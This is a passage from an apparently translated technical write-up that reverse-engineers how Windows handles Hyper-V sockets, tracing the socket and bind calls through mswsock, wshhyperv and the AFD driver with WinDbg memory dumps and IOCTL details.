<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint). On the client it is \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F2E0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1207B – AfdDispatchImmediateIrp ()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input buffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f2fc 00000007 00f6f38c c0140000 00f6f348 ............H...</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The IOCTL code is 1207Bh (afd!AfdDispatchImmediateIrp), but that dispatch routine is not executed, because the FastIO mechanism is involved (details follow in the Send example). Instead afd!AfdFastIoDeviceControl is executed; no IRP is built, and the user-mode buffer and its length are passed as the 3rd and 4th parameters of this function:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx – \Endpoint {Afd} object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000f6f2fc </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000010</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the function executes (the result is written to the same buffer):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f2fc 00000007 00000000 00010000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next ntdll!NtDeviceIoControlFile is called again, with the data returned by the previous call as its input buffer; the result does not change after this repetition. Had the function returned 103h, mswsock!SockWaitForSingleObject would have been called, followed by ws2_32!WahInsertHandleContext. Then mswsock!SockSocket returns and we are back in mswsock!WSPSocket, which enters mswsock!SockSetHandleContext. From there wshhyperv!WSHGetSocketInformation is called, then nt!NtDeviceIoControlFile with IOCTL 12047h (AfdDispatchImmediateIrp).</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following is passed as the input buffer (0xD4 is the buffer size):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 006FED58 006FED58+D4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f358 00000000 00000022 00000001 00000001 ...."...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f368 00000024 00000024 00000000 00000000 $...$...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f378 00000000 00010000 00010000 00001000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f388 00000000 000003e9 00020026 00000008 ........&.......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f398 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3a8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3b8 00000000 00000000 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ..........4..K.L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3c8 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">d7dfe086 45542bc3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000004 656b6361 .....+TE....acke</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3d8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3e8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3f8 00000000 012247f0 00000000 00000000 .....G".........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f408 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f418 00000000 00000000 00000000 d2ffd7d3 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f428 00000022</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the output buffer (nothing changed after mswsock!SockSetHandleContext executed):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 00F6F400 00F6F400+24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f400 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f410 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f420 00000000 d2ffd7d3 ........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From there ws2_32!WPUModifyIFSHandle is called (it calls ws2_32!WahInsertHandleContext and then works with the ws2_32!SockPrimes array). mswsock!SockSetHandleContext returns, and we return to our application.</span></div>
<br /><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bind</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The socket function finished successfully; bind is executed next:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">iResult = bind(ListenSocket, hints.ai_addr, (</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)hints.ai_addrlen);</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From here on I will not try to cover user mode in as much detail as for socket, and will note only the moments specific to Hyper-V sockets. mswsock!WSPBind is called, then mswsock!WahReferenceContextByHandle(HANDLE socket, PVOID SockContextTable). The address of the procedure held in ebx is compared with the start addresses of mswsock_Tcpip4_WSHGetSockaddrType and mswsock_Tcpip6_WSHGetSockaddrType. If it matches, the corresponding procedure is called directly; otherwise call ebx is executed (in our case wshhyperv!WSHGetSockaddrType):</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh6.googleusercontent.com/Xi54xOOf5D9kALZQgGtxatDFvhfZpXy2yqxTxkqRSwcah2uEWeL308IPh41uUKtcAYKorRNlwiA2K45SOzRx8LS3Hc7vg0zYLZ8vZrumgIXfCF04OM-zXzlQYwGDYh8pMFLfj-YbnbXI4H4gyw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="592" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The socket type is determined from the GUID set during bind (we set HV_GUID_ZERO):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="159" src="https://lh4.googleusercontent.com/-kbQPty3VuZMnb_ABETHzjDJVhUYSGwvZQ3tOXgOv60c4desbpB-bDkUJRxeYaYFwzMB2PSqfP3jvb7C08jtfKAtnCi_PzMQNt0BNL_8rFZr4Bb9XVFXTrU9zyuOZiHcRg_p4IdxTjRQL49oAw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="414" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the server in esi:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f990 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> "............... – </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f9a0 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f9b0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77 </span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the client:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc esi</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – esi holds the virtual machine ID GUID 6a964317-1d87-4a74-abf9-46a69b048900 (the GUID that the Get-VM | select ID, Name cmdlet returned on the server)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb2c 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab "....C.j..tJ..F.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb3c</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb4c</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab w.z..C.j..tJ..F. ????????????</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb5c</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb6c</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00d90000 40000062 02020202 w.z.....b..@....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00affb7c 536e6957 206b636f 00302e32 00000000 WinSock 2.0.....</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The GUID is compared first with HV_GUID_LOOPBACK, then with HV_GUID_BROADCAST and finally with HV_GUID_ZERO; if none matches, 0 is returned. Before that, the second argument (the address length) is checked against 0x24 (the size of SOCKADDR_HV) and the first dword of the first argument is checked for equality with 0x22 (AF_HYPERV with a zero Reserved field); if either check fails, an error is returned (0x271E, WSAEFAULT, and 0x273F, WSAEAFNOSUPPORT, respectively).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After further checks, ntdll!NtDeviceIoControlFile is called:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, 144 (\Device\Afd\Endpoint; on the client, \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
